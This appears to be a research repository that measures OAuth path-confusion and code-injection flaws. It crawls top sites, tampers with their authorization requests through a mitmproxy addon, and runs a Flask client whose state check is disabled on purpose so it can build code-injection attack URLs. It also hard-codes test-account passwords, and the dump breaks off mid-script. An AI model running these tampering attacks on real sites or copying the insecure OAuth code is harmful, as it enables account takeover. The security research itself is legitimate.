├── Pathconfusion-attacklist.json
├── requirements.txt
├── convert.sh
├── merge-sites-files.py
├── dump_http.py
├── login.html
├── Idps_info.json
├── attack.html
├── idp_keywords.json
├── generate-sites-files.py
├── Smallsetofsites.json
├── launcher.py
├── facebook.py
├── Start-PathConfusion-exp.py
├── verifysites.js
├── Start-SitesVerification.py
├── tamper_http_header-path_conf.py
├── README.md
├── Pup-Crawler.js
└── idps-identification.py
/Pathconfusion-attacklist.json:
--------------------------------------------------------------------------------
1 | {"Add_and_Remove1":"/FAKEPATH/",
2 | "Add_and_Remove2":"/FAKEPATH2/"
3 | }
--------------------------------------------------------------------------------
/requirements.txt:
--------------------------------------------------------------------------------
1 | beautifulsoup4==4.12.2
2 | Requests==2.31.0
3 | selenium==4.11.2
4 | urllib3==1.26.15
5 | tldextract==3.6.0
6 | Flask-Cors==4.0.0
7 |
--------------------------------------------------------------------------------
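
requirements.txt pins only the Python packages imported by the Python scripts. The rest of the toolchain used in this repository (mitmproxy for the tampering proxy, Node.js with Puppeteer for the crawlers) is not listed here. A minimal setup sketch, assuming recent Python 3 and Node.js installations; the package names are the publicly available ones and are not pinned by the repository:

    # Python dependencies (Flask is pulled in by Flask-Cors; mitmproxy provides mitmdump)
    pip3 install -r requirements.txt mitmproxy

    # Node dependencies used by verifysites.js (and presumably Pup-Crawler.js)
    npm install puppeteer tldjs argparse
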
/convert.sh:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env bash
2 |
3 | python3 generate-sites-files.py --sites $1
4 | echo "Generated one JSON file per site."
5 |
6 | python3 merge-sites-files.py
7 | echo "Merged the per-site JSON files into a single file."
8 |
--------------------------------------------------------------------------------
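
convert.sh chains the two helper scripts below: it first writes one JSON file per crawled site into json/ and then merges them into json/sites.json. A usage sketch, assuming the links/ directory produced by the crawler is present and the Tranco ranking CSV is named top-1m.csv (the filename is illustrative):

    ./convert.sh top-1m.csv
    # equivalent to running:
    #   python3 generate-sites-files.py --sites top-1m.csv
    #   python3 merge-sites-files.py
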
/merge-sites-files.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 |
3 | __author__ = "Matteo Golinelli"
4 | __copyright__ = "Copyright (C) 2023 Matteo Golinelli"
5 | __license__ = "MIT"
6 |
7 | '''
8 | Take all the single JSON files in the json/ folder
9 | and merge them into a single list dumped to one file
10 | '''
11 |
12 | import glob
13 | import json
14 |
15 | if __name__ == '__main__':
16 | json_files = glob.glob('json/*.json')
17 |
18 | data = []
19 | for json_file in json_files:
20 | with open(json_file) as f:
21 | data.append(json.load(f))
22 |
23 | with open('json/sites.json', 'w') as f:
24 | json.dump(data, f) # Note: no indentation here otherwise the file might get extremely big
25 |
--------------------------------------------------------------------------------
/dump_http.py:
--------------------------------------------------------------------------------
1 | import json
2 | import os
3 | import sys
4 |
5 |
6 |
7 | def get_headers(headers):
8 | hdrs = {}
9 |
10 | for name, value in headers:
11 | hdrs[name.decode('utf-8')] = value.decode('utf-8')
12 |
13 | return hdrs
14 |
15 | def get_content(content):
16 | if content:
17 | return content.decode('utf-8')
18 | else:
19 | return "No-Content"
20 |
21 |
22 | def response(flow):
23 | print(json.dumps({
24 | 'request': {
25 | 'timestamp_start': flow.request.timestamp_start,
26 | 'timestamp_end': flow.request.timestamp_end,
27 | 'method': flow.request.method,
28 | 'url': flow.request.url,
29 | 'headers': get_headers(flow.request.headers.fields),
30 | 'content': get_content(flow.request.content)
31 | },
32 | 'response': {
33 | 'timestamp_start': flow.response.timestamp_start,
34 | 'timestamp_end': flow.response.timestamp_end,
35 | 'status_code': flow.response.status_code,
36 | 'status_text': flow.response.reason,
37 | 'headers': get_headers(flow.response.headers.fields),
38 | 'content': get_content(flow.response.content)
39 | }
40 | })+",", file=sys.stdout)
41 |
--------------------------------------------------------------------------------
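
dump_http.py is a mitmproxy addon: mitmproxy calls its response() hook for every completed flow, and the hook prints the request/response pair as a JSON object followed by a comma. A usage sketch; the output redirection and the surrounding brackets needed to turn the comma-separated objects into a valid JSON array are assumptions, not something the script does itself:

    # -q suppresses mitmdump's own flow log so stdout contains only the JSON objects
    mitmdump -q -s dump_http.py > flows.txt
    # flows.txt then has to be wrapped in [ ... ] and its trailing comma removed to be valid JSON
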
/login.html:
--------------------------------------------------------------------------------
1 |
2 |
3 | {% block title %}{% endblock %}Login with {{ provider }}
4 |
5 |
6 | Home
7 | Login with {{ provider }}
8 |
12 |
13 | Authorization request
14 |
15 |
20 |
21 |
22 |
23 |
28 |
29 |
30 |
31 |
36 |
--------------------------------------------------------------------------------
/Idps_info.json:
--------------------------------------------------------------------------------
1 | {"facebook.com":{
2 | "Username":"tommycall.text@gmail.com",
3 | "Password":"Boston2021",
4 | "Fill":{
5 | "User-Type": "ID",
6 | "Pass-Type": "ID",
7 | "Form-User": "email",
8 | "Form-Pass": "pass"
9 | },
10 | "Submit":{
11 | "Button-Type": "ID",
12 | "Button": "loginbutton"
13 | },
14 | "Grant":{
15 | "Button-Type": "QuerySelector",
16 | "Button": "div[aria-label*='ontinua']"
17 | }
18 | },
19 | "twitter.com":{
20 | "Username":"tommycall.text@gmail.com",
21 | "Password":"Boston2021",
22 | "Fill":{
23 | "User-Type":"ID",
24 | "Pass-Type":"ID",
25 | "Form-User":"username_or_email",
26 | "Form-Pass":"password"
27 | },
28 | "Submit":{
29 | "Button-Type":"ID",
30 | "Button":"allow"
31 | },
32 | "Grant":{
33 | "Button-Type":"XPath",
34 | "Button":"//div[contains(@aria-label,'ontinua')]"
35 | }
36 | },
37 | "line.me":{
38 | "Username":"tommycall.text@gmail.com",
39 | "Password":"Boston2021",
40 | "Fill":{
41 | "User-Type":"exception",
42 | "Pass-Type":"exception",
43 | "Form-User":"fill%%Name%%tid%%tommycall.text@gmail.com%%login",
44 | "Form-Pass":"fill%%Name%%tpasswd%%Boston2021%%login"
45 | },
46 | "Submit":{
47 | "Button-Type":"XPath",
48 | "Button":"//*[contains(text(), \"Log in\") or contains(@value,'Log in')]"
49 | },
50 | "Grant":{
51 | "Button-Type":"XPath",
52 | "Button":"//*[contains(text(), \"Allow\")]"
53 | }
54 | }}
--------------------------------------------------------------------------------
/attack.html:
--------------------------------------------------------------------------------
1 |
2 |
3 | {% block title %}{% endblock %}Login with {{ provider }}
4 |
5 |
6 | Home
7 | Login with {{ provider }}
8 |
9 | Code & State
10 | Code {{ code }}
11 |
12 | State {{ state }}
13 |
14 | OPP Attack URL
15 | {{ attack_URL }}
16 |
17 |
18 |
19 | Redeem request
20 |
21 |
27 |
28 |
29 |
30 |
36 |
37 |
38 |
39 |
45 |
46 |
47 |
48 |
60 |
--------------------------------------------------------------------------------
/idp_keywords.json:
--------------------------------------------------------------------------------
1 | {"atlassian.com":{"Keywords":["redirect_uri","state","client_id","response_type"],"idphostname":"bitbucket.org","Url_Prefix":["bitbucket.org/site/oauth2/authorize?","bitbucket.org/api/"]},
2 | "github.com":{"Keywords":["redirect_uri"],"idphostname":"github.com","Url_Prefix":["github.com/login/oauth/authorize?"]},
3 | "vk.com":{"Keywords":["redirect_uri"],"idphostname":"vk.com","Url_Prefix":["oauth.vk.com/authorize","api.vk.com/oauth/authorize?"]},
4 | "linkedin.com":{"Keywords":["redirect_uri","state","client_id","response_type"],"idphostname":"linkedin.com","Url_Prefix":["linkedin.com/oauth/v2/authorization?"]},
5 | "line.me":{"Keywords":["redirect_uri","state","client_id","response_type"],"idphostname":"line.me","Url_Prefix":["access.line.me/oauth2/"]},
6 | "ok.ru":{"Keywords":["redirect_uri","client_id","response_type"],"idphostname":"ok.ru","Url_Prefix":["connect.ok.ru/oauth/authorize"]},
7 | "microsoftonline.com":{"Keywords":["redirect_uri","state","client_id","response_type"],"idphostname":"microsoftonline.com","Url_Prefix":["login.microsoftonline.com/common/oauth2/"]},
8 | "live.com":{"Keywords":["redirect_uri","client_id","response_type"],"idphostname":"live.com","Url_Prefix":["login.live.com/oauth20_authorize.srf"]},
9 | "facebook.com":{"Keywords":["redirect_uri","client_id"],"idphostname":"facebook.com","Url_Prefix":["/dialog/oauth"]},
10 | "orcid.org":{"Keywords":["redirect_uri","client_id","response_type"],"idphostname":"orcid.org","Url_Prefix":["orcid.org/oauth/authorize?"]},
11 | "slack.com":{"Keywords":["redirect_uri","state","client_id"],"idphostname":"slack.com","Url_Prefix":["slack.com/oauth"]},
12 | "yandex.ru":{"Keywords":["redirect_uri","client_id","response_type"],"idphostname":"yandex.ru","Url_Prefix":["oauth.yandex.ru/authorize"]},
13 | "yahoo.com":{"Keywords":["redirect_uri","client_id","response_type"],"idphostname":"yahoo.com","Url_Prefix":["api.login.yahoo.com/oauth2/request_auth?"]},
14 | "reddit.com":{"Keywords":["redirect_uri","state","client_id","response_type"],"idphostname":"reddit.com","Url_Prefix":["/ssl.reddit.com/api/"]},
15 | "twitter.com":{"Keywords":["oauth_token"],"idphostname":"twitter.com","Url_Prefix":["api.twitter.com/oauth/authenticate"]},
16 | "kakao.com":{"Keywords":["redirect_uri","client_id","response_type"],"idphostname":"kakao.com","Url_Prefix":["kauth.kakao.com/oauth/authorize"]}
17 | }
--------------------------------------------------------------------------------
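
Each entry pairs an IdP with the query-string keywords, URL prefixes, and hostname that the tampering proxy uses to recognise the authorization request to rewrite. Start-PathConfusion-exp.py turns one entry plus one payload from Pathconfusion-attacklist.json into mitmdump --set options; a sketch of the resulting command for the github.com entry (the save_stream_file name is illustrative):

    mitmdump --set listen_port=7777 --set http2=false \
      -s tamper_http_header-path_conf.py \
      --set save_stream_file=example-github-stream \
      --set keywords0=redirect_uri \
      --set inject=/FAKEPATH/ \
      --set "linkprefix0=github.com/login/oauth/authorize?" \
      --set idphostname=github.com
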
/generate-sites-files.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 |
3 | __author__ = "Matteo Golinelli"
4 | __copyright__ = "Copyright (C) 2023 Matteo Golinelli"
5 | __license__ = "MIT"
6 |
7 | import argparse
8 | import logging
9 | import glob
10 | import json
11 | import csv
12 | import os
13 |
14 | '''
15 | For each site crawled, generate a JSON file with the following structure:
16 |
17 | {
18 | 'site': '',
19 | 'ranking': '',
20 | 'loginpages': [{
21 | 'loginpage': '',
22 | 'SSOs': [
23 | {
24 | 'provider': 'google',
25 | 'attributes': [{
26 | 'name': 'class',
27 | 'value': 'grid--cell s-btn s-btnicon s-btngoogle bar-md ba bc-black-100'
28 | }, {
29 | 'name': 'data-oauthserver',
30 | 'value': 'https://accounts.google.com/o/oauth2/auth'
31 | }, {
32 | 'name': 'data-oauthversion',
33 | 'value': '2.0'
34 | }, {
35 | 'name': 'data-provider',
36 | 'value': 'google'
37 | }],
38 | 'tag': 'button',
39 | 'dompath': '//html/body/div[3]/div[2]/div[1]/div[2]/button[1]'
40 | }, ...
41 | ]
42 | }, ...
43 | ]
44 | }
45 | '''
46 |
47 | if __name__ == '__main__':
48 | parser = argparse.ArgumentParser(description='Generate JSON files for each site crawled.')
49 |
50 | parser.add_argument('-s', '--sites', help='Tranco ranking csv file', required=True)
51 | parser.add_argument('-d', '--debug', action='store_true', help='Verbose output')
52 | args = parser.parse_args()
53 |
54 | if args.debug:
55 | logging.basicConfig(level=logging.DEBUG)
56 | else:
57 | logging.basicConfig(level=logging.INFO)
58 |
59 | if not os.path.exists('json'):
60 | os.makedirs('json')
61 |
62 | clean_dictionary = {
63 | 'site': '',
64 | 'ranking': '',
65 | 'loginpages': []
66 | }
67 |
68 | tranco = {}
69 |
70 | with open(args.sites, 'r') as f:
71 | reader = csv.reader(f)
72 |
73 | for row in reader:
74 | tranco[row[1]] = int(row[0])
75 |
76 | for filename in glob.glob('links/*'):
77 | with open(filename, 'r') as f:
78 | links = json.load(f)
79 |
80 | output = clean_dictionary.copy()
81 |
82 | output['site'] = links['site']
83 | output['ranking'] = str(tranco[links['site']]) if links['site'] in tranco else '-1'
84 | output['loginpages'] = []
85 | if len(links['login']) > 0:
86 | for login in links['login']:
87 | idps_loginpage = links['login'][login]
88 |
89 | loginpage = {
90 | 'loginpage': login,
91 | 'SSOs': []
92 | }
93 |
94 | for provider in idps_loginpage:
95 | data = {
96 | 'provider': provider
97 | }
98 | if 'xpath' in idps_loginpage[provider]:
99 | data['xpath'] = idps_loginpage[provider]['xpath']
100 | if 'tag' in idps_loginpage[provider]:
101 | data['tag'] = idps_loginpage[provider]['tag']
102 | if 'url' in idps_loginpage[provider]:
103 | data['url'] = idps_loginpage[provider]['url']
104 | loginpage['SSOs'].append(data)
105 |
106 | output['loginpages'].append(loginpage)
107 |
108 | with open('json/' + links['site'] + '.json', 'w') as f:
109 | json.dump(output, f, indent=4)
110 |
111 | logging.debug('Done.')
112 |
--------------------------------------------------------------------------------
/Smallsetofsites.json:
--------------------------------------------------------------------------------
1 | [{"site": "naver.com", "ranking": "98", "loginpages": [{"loginpage": "https://nid.naver.com/nidlogin.login", "SSOs": [{"provider": "facebook.com", "xpath": "//a/*[contains(text(), \"Facebook\")]", "tag": "Facebook", "url": "https://nid.naver.com/nidlogin.login"}, {"provider": "line.me", "xpath": "//a/*[contains(text(), \"Line\")]", "tag": "Line", "url": "https://nid.naver.com/oauth/global/initSNS.nhn?idp_cd=line&locale=en_US&svctype=1&postDataKey=&url=https%3A%2F%2Fwww.naver.com"}, {"provider": "facebook.com", "xpath": "//a/*[contains(text(), \"Facebook\")]", "tag": "Facebook", "url": "https://nid.naver.com/nidlogin.login"}]}]},
2 | {"site": "medium.com", "ranking": "68", "loginpages": [{"loginpage": "https://medium.com/m/signin", "SSOs": [{"provider": "twitter.com", "xpath": "//a/*[contains(text(), \"Sign in with Twitter\")]", "tag": "", "url": "https://medium.com/m/account/authenticate-twitter?state=twitter-%7Chttps%3A%2F%2Fmedium.com%2F%3Fsource%3Dlogin----------------------------------------%7Clogin&source=login----------------------------------------"},{"provider": "facebook.com", "xpath": "//a/*[contains(text(), \"Sign in with Facebook\")]", "tag": "", "url": "https://medium.com/m/connect/facebook?state=facebook-%7Chttps%3A%2F%2Fmedium.com%2F%3Fsource%3Dlogin----------------------------------------%7Clogin&source=login----------------------------------------"}]}]},
3 | {"site": "wix.com", "ranking": "127", "loginpages": [{"loginpage": "https://users.wix.com/signin?postLogin=https%3A%2F%2Fwww.wix.com%2Fmy-account%2Fsites&view=sign-up&sendEmail=true&loginCompName=Get%20Started%20F1&referralInfo=Get%20Started%20F1", "SSOs": [{"provider": "facebook.com", "xpath": "//button/*[contains(text(), \"Continue with Facebook\")]", "tag": ""}]}]}
4 | ]
--------------------------------------------------------------------------------
/launcher.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 |
3 | __author__ = "Matteo Golinelli"
4 | __copyright__ = "Copyright (C) 2023 Matteo Golinelli"
5 | __license__ = "MIT"
6 |
7 | from time import sleep
8 |
9 | import subprocess
10 | import traceback
11 | import argparse
12 | import logging
13 | import random
14 | import shlex
15 | import json
16 | import sys
17 | import os
18 |
19 | MAX = 5 # Max number of processes to run at once
20 | crawler = 'idps-identification.py'
21 |
22 | # Tested sites
23 | tested = []
24 |
25 | if __name__ == '__main__':
26 | parser = argparse.ArgumentParser(prog='launcher.py', description='Launch the crawler on a list of sites')
27 |
28 | parser.add_argument('-s', '--sites',
29 |         help='Sites list in CSV format with two columns: rank,site', required=True)
30 | parser.add_argument('-m', '--max', default=MAX,
31 | help=f'Maximum number of sites to test concurrently (default: {MAX})')
32 | parser.add_argument('-a', '--arguments', default='',
33 | help='Additional arguments to pass to the crawler (use with = sign: -a="--arg1 --arg2")')
34 | parser.add_argument('-t', '--testall', default=False,
35 | help='Test also already tested sites', action='store_true')
36 | parser.add_argument('-c', '--crawler', default=crawler,
37 | help='Alternative crawler script name to launch')
38 | parser.add_argument('-d', '--debug', action='store_true',
39 | help='Enable debug mode')
40 |
41 | args = parser.parse_args()
42 |
43 | if args.max:
44 | MAX = int(args.max)
45 |
46 | logging.basicConfig()
47 | logger = logging.getLogger('launcher')
48 | logger.setLevel(logging.INFO)
49 | if args.debug:
50 | logger.setLevel(logging.DEBUG)
51 |
52 | # Retrieve already tested sites from tested.json file
53 | if not args.testall and os.path.exists(f'logs/tested.json'):
54 | with open(f'logs/tested.json', 'r') as f:
55 | tested = json.load(f)
56 |
57 | if len(tested) > 0:
58 | random.shuffle(tested)
59 | logger.info(f'Already tested sites ({len(tested)}): {", ".join(tested[:min(len(tested), 10)])}' +
60 | f'... and {len(tested) - min(len(tested), 10)} more')
61 |
62 | denylist = ['google', 'facebook', 'amazon', 'twitter', '.gov', 'acm.com', 'jstor.org', 'arxiv']
63 |
64 | sites = []
65 | try:
66 | with open(args.sites, 'r') as f:
67 | sites = [s.strip() for s in f.readlines()]
68 |
69 | random.shuffle(sites)
70 |
71 | processes = {}
72 |
73 | for site in sites:
74 | if any(i in site for i in denylist):
75 | continue
76 | try:
77 | rank = int(site.strip().split(',')[0])
78 | site = site.strip().split(',')[1]
79 |
80 | first = True # Execute the loop the first time regardless
81 | # Loop until we have less than MAX processes running
82 | while len(processes) >= MAX or first:
83 | first = False
84 |
85 | for s in processes.keys():
86 | state = processes[s].poll()
87 |
88 | if state is not None: # Process has finished
89 | del processes[s]
90 | logger.info(f'[{len(tested)}/{len(sites)} ({len(tested)/len(sites)*100:.2f}%)] {s} tested, exit-code: {state}.')
91 | if state == 0:
92 | tested.append(s)
93 | with open(f'logs/tested.json', 'w') as f:
94 | json.dump(tested, f)
95 | break
96 | sleep(1)
97 |
98 | if site in tested and not args.testall:
99 | continue
100 |
101 | # When we have less than MAX processes running, launch a new one
102 | if site != '' and site not in tested:
103 | cmd = f'python3 {args.crawler} -t {site} {args.arguments}'
104 | logger.info(f'Testing {site}')
105 | try:
106 | p = subprocess.Popen(shlex.split(cmd))
107 | processes[site] = p
108 |
109 | #p = subprocess.Popen(shlex.split('python3 sleep-print.py ' + site))
110 | #processes[site] = p
111 |
112 | print('\t\t >>>', cmd)
113 | except subprocess.TimeoutExpired as e:
114 | logger.error(f'Timeout expired for {site}')
115 | except subprocess.CalledProcessError as e:
116 | logger.error(f'Could not test site {site}')
117 | except Exception as e:
118 | logger.error(f'Could not test site {site}')
119 | traceback.print_exc()
120 | except Exception as e:
121 | logger.error(f'Error [{site}] {e}')
122 | traceback.print_exc()
123 | except KeyboardInterrupt:
124 | logger.error('Keyboard interrupt')
125 | except:
126 | logger.error(traceback.format_exc())
127 | finally:
128 | logger.info(f'Tested sites ({len(tested)}): {", ".join(tested[:min(len(tested), 10)])}' +
129 | f'... and {len(tested) - min(len(tested), 10)} more')
130 | with open(f'logs/tested.json', 'w') as f:
131 | json.dump(tested, f)
132 |
--------------------------------------------------------------------------------
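
launcher.py keeps at most MAX instances of the crawler (idps-identification.py by default) running in parallel over a rank,site CSV and records completed sites in logs/tested.json. An invocation sketch, assuming the same illustrative top-1m.csv; the mkdir is an assumption because the script writes logs/tested.json but does not create the logs/ directory itself:

    mkdir -p logs
    # run at most 10 crawler instances concurrently over the rank,site CSV
    python3 launcher.py --sites top-1m.csv --max 10
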
/facebook.py:
--------------------------------------------------------------------------------
1 | from flask import Flask, Response, request, make_response, redirect, render_template, jsonify
2 | from flask import session as login_session
3 | from flask_cors import CORS
4 |
5 | from urllib.parse import urlparse, urlunparse
6 | import requests
7 | import random
8 | import string
9 | import json
10 |
11 | app = Flask(__name__)
12 | CORS(app)
13 |
14 | DO_NOT_CHECK_STATE = True
15 |
16 | ngrok = 'https://4406-2-37-67-76.ngrok.io'
17 | authorization_base_url = 'https://www.facebook.com/v16.0/dialog/oauth'
18 | token_url = 'https://graph.facebook.com/v16.0/oauth/access_token'
19 | request_url = 'https://graph.facebook.com/v16.0/me'
20 | redirect_uri = f'{ngrok}/login/oauth/authorize'
21 |
22 | client_id = '937387930629121'
23 | client_secret = 'REDACTED'
24 | scope = 'email'
25 | inject_code = '1234567890'
26 |
27 | # Login page
28 | @app.route('/', methods=['GET'])
29 | def show_login():
30 | """
31 | Show the login page and create the random state parameter.
32 | If the user is authenticated, redirect to the main page.
33 | """
34 | print(f'show_login(), session: {login_session}')
35 | if 'access_token' in login_session:
36 | return redirect('/index')
37 | state = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(32))
38 | login_session['state'] = state
39 | #return jsonify(state=state)
40 | return render_template('login.html', state=state, provider='Facebook')
41 |
42 | # 1. Send initial request to get permissions from the user
43 | @app.route('/handleLogin', methods=["GET"])
44 | def handleLogin():
45 | '''
46 | Make the first request to get authorization from the user.
47 | '''
48 | # Check if there's a passed callback URL
49 | if 'callback' in request.args:
50 | if request.args.get('callback').startswith('/'):
51 | _redirect_uri = redirect_uri + request.args.get('callback')[1:]
52 | else:
53 | _redirect_uri = redirect_uri + request.args.get('callback')
54 | else:
55 | _redirect_uri = redirect_uri
56 |
57 | # Check that the state parameter is valid
58 | if DO_NOT_CHECK_STATE or login_session['state'] == request.args.get('state'):
59 | # Get the authorization code
60 | url = f'{authorization_base_url}?client_id={client_id}&state={login_session["state"]}' + \
61 | f'&scope={scope}' + \
62 | f'&response_type=code' + \
63 | f'&redirect_uri={_redirect_uri}'
64 | return redirect(url)
65 | else:
66 | return jsonify(invalid_state_token="invalid_state_token")
67 |
68 | # 1. Redeem tests: send authorization request
69 | @app.route('/authorize', methods=["GET"])
70 | def authorize():
71 | '''
72 | Make the first request to get authorization from the user.
73 | '''
74 | if 'test' in request.args:
75 | test = request.args.get('test')
76 | else:
77 | test = 'genuine'
78 |
79 | _redirect_uri = ''
80 | if test == 'genuine':
81 | _redirect_uri = f'{redirect_uri}'
82 |
83 | elif test == 'code_injection':
84 | _redirect_uri = f'{redirect_uri}%3Fcode%3D{inject_code}'
85 |
86 | elif test == 'code_injection_path_confusion':
87 | _redirect_uri = f'{redirect_uri}/FAKEPATH'
88 |
89 | # Get the authorization code
90 | url = f'{authorization_base_url}?client_id={client_id}&state={login_session["state"]}' + \
91 | f'&response_type=code' + \
92 | f'&scope={scope}' + \
93 | f'&redirect_uri={_redirect_uri}'
94 | return redirect(url)
95 |
96 | # /login/oauth/authorize
97 | #2. Using the /callback route to handle authentication
98 | @app.route('/login/oauth/authorize', methods=['GET', 'POST'])
99 | def handle_callback_login():
100 | if DO_NOT_CHECK_STATE or login_session['state'] == request.args.get('state'):
101 | if 'state' not in login_session:
102 | return render_template(
103 | 'attack.html', attack_URL='',
104 | provider='Facebook',
105 | code=request.args.get('code'),
106 | state=request.args.get('state')
107 | )
108 | if 'code' in request.args:
109 | # Create an attack URL to redirect the user to by injecting the received code into the redirect_URI
110 | _redirect_uri = f'{redirect_uri}%3Fcode%3D{request.args.get("code")}'
111 | url = f'{authorization_base_url}?client_id={client_id}&state={login_session["state"]}' + \
112 | f'&response_type=code' + \
113 | f'&scope={scope}' + \
114 | f'&redirect_uri={_redirect_uri}'
115 | return render_template(
116 | 'attack.html', attack_URL=url,
117 | provider='Facebook',
118 | code=request.args.get('code'),
119 | state=request.args.get('state')
120 | )
121 | else:
122 | return jsonify(error="404_no_code"), 404
123 | else:
124 | return jsonify(invalid_state_token="invalid_state_token")
125 |
126 | @app.route('/redeem', methods=['GET'])
127 | def redeem():
128 | '''
129 | Redeem the authorization code for an access token.
130 | '''
131 | if 'code' in request.args:
132 | if 'test' in request.args:
133 | test = request.args.get('test')
134 | else:
135 | test = 'genuine'
136 |
137 | _redirect_uri = ''
138 | if test == 'genuine':
139 | _redirect_uri = f'{redirect_uri}'
140 |
141 | elif test == 'code_injection':
142 | _redirect_uri = f'{redirect_uri}%3Fcode%3D{inject_code}'
143 |
144 | elif test == 'code_injection_path_confusion':
145 | _redirect_uri = f'{redirect_uri}/FAKEPATH'
146 |
147 | # Redeem the authorization code for an access token
148 | url = f'{token_url}?' + \
149 | f'client_id={client_id}&client_secret={client_secret}' + \
150 | f'&code={request.args.get("code")}' + \
151 | f'&redirect_uri={_redirect_uri}' + \
152 | f'&grant_type=authorization_code'
153 | r = requests.get(url)
154 |
155 | print(f'redeem: {url}')
156 |
157 | try:
158 | return jsonify(r.json())
159 | except AttributeError:
160 | app.logger.debug('error redeeming the code')
161 | return jsonify(response=r.text), 500
162 | else:
163 | return jsonify(error="404_no_code"), 404
164 |
165 | # 3. Get user information from Facebook
166 | @app.route('/index')
167 | def index():
168 | print(f'index, session: {login_session}')
169 | # Check for access_token in session
170 | if 'access_token' not in login_session:
171 | return 'You are not authenticated', 404
172 |
173 | # Retrieve user information from the API
174 | url = request_url
175 | r = requests.get(url,
176 | params={
177 | 'access_token': login_session['access_token'],
178 | 'client_id': client_id,
179 | 'client_secret': client_secret,
180 | 'redirect_uri': redirect_uri
181 | })
182 | try:
183 | response = r.json()
184 | return jsonify(response=response)
185 |
186 | except AttributeError:
187 | app.logger.debug('error getting the information')
188 | return "Error retrieving the information", 500
189 |
190 | @app.errorhandler(404)
191 | def page_not_found(e):
192 | return jsonify(request.args), 404
193 | # if 'error' in request.args and 'redirect_uri_mismatch' in request.args.get('error'):
194 | # return jsonify(request.args)
195 | # else:
196 |
197 | if __name__ == '__main__':
198 | app.secret_key = 'super_secret_key'
199 | app.run(debug=True, port=8081)
200 |
--------------------------------------------------------------------------------
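
facebook.py is a small Flask relying party used to exercise the Facebook OAuth flow and its redeem tests (genuine, code_injection, code_injection_path_confusion). It expects to be reachable at the public URL hard-coded in the ngrok variable, which must also be registered as a valid redirect URI for the Facebook app, and the client_secret must be filled in. A run sketch; the ngrok invocation is an assumption about how that public URL is obtained:

    # expose the local Flask app publicly, then copy the printed URL into the `ngrok` variable
    ngrok http 8081 &
    python3 facebook.py   # serves on http://127.0.0.1:8081
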
/Start-PathConfusion-exp.py:
--------------------------------------------------------------------------------
1 | import subprocess
2 | from subprocess import PIPE
3 | from subprocess import TimeoutExpired
4 | import urllib.parse
5 | import re,time,json,os,sys
6 | import hashlib
7 |
8 |
9 | def Identify_SSO_idp(idp,SSO):
10 | sso=[]
11 | for i in SSO:
12 | if i["provider"]==idp:
13 | sso.append(i)
14 | return sso
15 |
16 |
17 | if __name__ == "__main__":
18 |     #inputs: sites/login-pages JSON, output folder, path-confusion list, IdP keywords, IdP info
19 | sites = json.load(open(sys.argv[1],'r'))
20 | outputfolder=sys.argv[2]
21 | Pathconf=json.load(open(sys.argv[3]))
22 | keyword_Pathconf=json.load(open(sys.argv[4]))
23 | Idp_info=json.load(open(sys.argv[5]))
24 | measurement= "pathconfusion-fixsitesaddremove3"
25 |
26 |     #for each site: obtain its SSOs and modify them, run the MITM proxy, run the login crawler.
27 |
28 | Site_analyzed=[]
29 | restart=False
30 | start_time = time.time()
31 | #Path output result
32 | main_path=outputfolder
33 | if not os.path.exists(main_path):
34 | os.makedirs(main_path)
35 | else:
36 |         print("directory already present, do not overwrite")
37 |
38 |     #for each path confusion payload
39 | for p in Pathconf:
40 |         print(f'start analyzing path confusion: {Pathconf[p]}')
41 | #Path output pathconfusion
42 | gen_path=main_path+"/"+p
43 | if not os.path.exists(gen_path):
44 | os.makedirs(gen_path)
45 | else:
46 |             print("directory already present, do not overwrite")
47 |
48 | Site_analyzed=[]
49 | fractionate=0
50 | for site in sites:
51 | if(not site['loginpages']):
52 |                 print(f'Site {site["site"]} without login pages')
53 | continue
54 |             #used to space out measurements
55 | fractionate+=1
56 | for l in site['loginpages']:
57 | #no SSO move to next login page
58 | if(len(l["SSOs"])==0):continue
59 | print(f'Test path confusion {p} for idp:{l["SSOs"][0]["provider"]} on site: {site["site"]}')
60 |
61 | accIdP=[]
62 | for k in l["SSOs"]:
63 | if(k["provider"]not in accIdP):
64 | accIdP.append(k["provider"])
65 |
66 | Idp_sso=[]
67 | for a in accIdP:
68 | Idp_sso.extend(Identify_SSO_idp(a,l["SSOs"]))
69 |
70 | if(Idp_sso==[]):continue
71 | for s in Idp_sso:
72 | refineidp=s["provider"]
73 | Idp=refineidp
74 | commands=[]
75 | pagehash=hashlib.md5((l["loginpage"]+s["xpath"]).encode('utf-8')).hexdigest()
76 | namefile=str(site["site"])+"-"+str(s["provider"])+"-"+str(pagehash)
77 |
78 |                     if(s["provider"] not in Idp_info.keys()):
79 |                         print(f'Provider {s["provider"]} not included, skip it')
80 | with open(gen_path+"/"+namefile+"-crawlerlog.txt", 'w') as f:
81 | f.write("IDP not implemented!!!\nRESULT-EXPERIMENT:-1")
82 | continue
83 |
84 |                     if(s["provider"] not in keyword_Pathconf.keys()):
85 |                         print(f'Provider {s["provider"]} not included in the IdP keywords file, skip it')
86 | with open(gen_path+"/"+namefile+"-crawlerlog.txt", 'w') as f:
87 | f.write("Keywords of IDP not present!!!\nRESULT-EXPERIMENT:-1")
88 | continue
89 |
90 | print(f'Testing site:{site["site"]} idp:{s["provider"]} and path confusion:{Pathconf[p]} in login page: {l["loginpage"]}')
91 | Site_analyzed.append(namefile)
92 |
93 | #build string for mitmproxy
94 | cmd=["mitmdump","--set","listen_port=7777",
95 | "--set","http2=false",
96 | "-s","tamper_http_header-path_conf.py"]
97 |
98 | stream="save_stream_file="+namefile+"-stream"
99 | cmd.append("--set")
100 | cmd.append(stream)
101 |
102 | Idp_keywords=keyword_Pathconf[refineidp]["Keywords"]
103 | Idp_url_prefix=keyword_Pathconf[refineidp]["Url_Prefix"]
104 |
105 |
106 | for k in range(len(Idp_keywords)):
107 | cmd.append("--set")
108 | cmd.append("keywords"+str(k)+"="+str(Idp_keywords[k]))
109 | cmd.append("--set")
110 | cmd.append("inject="+str(Pathconf[p]))
111 | for r in range(len(Idp_url_prefix)):
112 | cmd.append("--set")
113 | cmd.append("linkprefix"+str(r)+"="+str(Idp_url_prefix[r]))
114 |
115 | cmd.append("--set")
116 | cmd.append("idphostname="+str(keyword_Pathconf[refineidp]["idphostname"]))
117 |
118 | print(cmd)
119 | #save command
120 | commands.append("command for proxy:")
121 | commands.append(cmd)
122 |
123 | #start proxy
